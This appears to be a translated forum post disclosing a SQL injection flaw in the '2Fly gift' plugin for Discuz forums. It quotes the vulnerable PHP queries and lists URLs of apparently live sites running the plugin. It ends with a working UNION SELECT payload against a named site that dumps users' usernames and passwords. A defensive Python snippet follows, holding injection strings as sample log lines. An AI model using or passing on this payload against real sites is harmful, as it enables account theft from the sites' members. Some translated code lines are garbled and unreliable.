Discuz plug-in account distribution system injection 0 day

Source: Internet
Author: User

Plug-in name: 2Fly gift (serial number) Issuing System
Vulnerability file: 2fly_gift.php (the latest version only)
Author: CN. Tnik & Tojen (fellow villagers)

Code Analysis:
The root cause is that the gameid parameter is never filtered before it is interpolated into a query, which leads to SQL injection.
1. gameid under the output branch:
    $query = $db->query("SELECT * FROM `{$tablepre}2fly_gift` WHERE `id`=$gameid LIMIT 1");
    $game  = $db->fetch_array($query);
http://www.klcwsj.com/2fly_gift.php?action=output&gameid=45
http://bbs.yeswan.com/2fly_gift.php?action=output&gameid=16
After a UNION, however, this branch has no display position in its output, so no data comes back.
2. gameid under the ipvsors branch is not filtered either:
    $query = $db->query("SELECT id, good_names, acc, total, remain, record, expiration FROM `{$tablepre}2fly_gift` WHERE `id`=$gameid LIMIT 1");
    $game  = $db->fetch_array($query);
http://bbs.yeswan.com/2fly_gift... ecord&gameid=17
Obviously injectable, and I originally expected this one to be exploitable, but something unexpected turned up:
    $recordb = explode("||", $game['record']);
    $acc2    = explode("", $game['acc']);
    $remain  = $game['remain'];
    $remain2 = $game['remain'] + 1;

    /* Parse the uids of the members who have already received a code */
    foreach ($recordb as $recordnow) {
        $recordc       = explode("_", $recordnow);
        $recordd[]     = substr($recordc[0], 1);
        $tsbuserID[]   = $recordc[0];
        $tsbfafang[]   = $recordc[1];
        $randomPW[]    = $recordc[2];
        $checkboxTsb[] = $recordc[3];
        if (substr($recordc[0], 1) != '') {
            if ($recordc[0])
                $uids .= ',' . substr($recordc[0], 1);   // builds ",uid1,uid2,..."
        }
    }

    $table .= "<form name=form1 method=post action=2fly_gift.php?action=extends SORS&pages=view_record_edit&gameid=" . $gameid . ">";

    /* Read the user names */
    $uidss    = array();
    $uidquery = $db->query("SELECT uid, username FROM {$tablepre}members WHERE uid IN (" . substr($uids, 1) . ") ORDER BY uid ASC");

As soon as `and 1=2` is appended, $game comes back empty, so $uids stays empty, the IN() query errors out, and execution is blocked here with nothing displayed. I won't go into the other places; if you are interested, check whether there is a good way to get past this. There are also some UPDATE statements in the file, and whether they can be used I do not know.
Earlier versions, however, are still exploitable. They have a content branch:
http://www.iacct.cn/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,16,17,18,19,20,21,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from week
This dumps username:password.
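As an added example (not the plugin's code or the author's), the following Python mirrors the two defender-side responses to an unfiltered numeric parameter like gameid: an intval()-style coercion, which is the usual fix in Discuz code, and a scan of constructed access-log lines that flags any request to 2fly_gift.php whose gameid is not a plain integer. The log lines, and the names intval_like, is_suspicious_gameid and scan_log, are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not taken from the page); the third is an ordinary Discuz request.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2012:10:00:01 +0800] "GET /2fly_gift.php?action=output&gameid=45 HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2012:10:00:02 +0800] "GET /2fly_gift.php?pages=content&gameid=16%20and%201%3D2%20union%20select%201,2,3 HTTP/1.1" 200 7300
10.0.0.9 - - [01/Jan/2012:10:00:03 +0800] "GET /forum.php?mod=viewthread&tid=123 HTTP/1.1" 200 9000
10.0.0.7 - - [01/Jan/2012:10:00:04 +0800] "GET /2fly_gift.php?action=output&gameid=-1%20or%201%3D1 HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')


def intval_like(raw):
    """Mimic PHP intval(): keep only a leading signed integer, otherwise 0.
    Coercing $gameid this way before the query is the usual Discuz-style fix,
    because whatever follows the digits never reaches SQL."""
    m = re.match(r'\s*[+-]?\d+', raw)
    return int(m.group(0)) if m else 0


def is_suspicious_gameid(raw):
    """True when gameid is not a plain integer, i.e. exactly the kind of value
    the unfiltered query interpolates verbatim."""
    return re.fullmatch(r'[+-]?\d+', raw) is None


def scan_log(text):
    """Return (client, raw gameid, coerced gameid) for every 2fly_gift.php request
    whose gameid would have changed the meaning of the SQL."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group('target'))
        if not url.path.endswith('/2fly_gift.php'):
            continue
        client = line.split(' ', 1)[0]
        for raw in parse_qs(url.query, keep_blank_values=True).get('gameid', []):
            if is_suspicious_gameid(raw):
                findings.append((client, raw, intval_like(raw)))
    return findings


if __name__ == '__main__':
    for client, raw, coerced in scan_log(SAMPLE_LOG):
        print(f"{client}: gameid={raw!r} (intval would have passed {coerced})")
```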
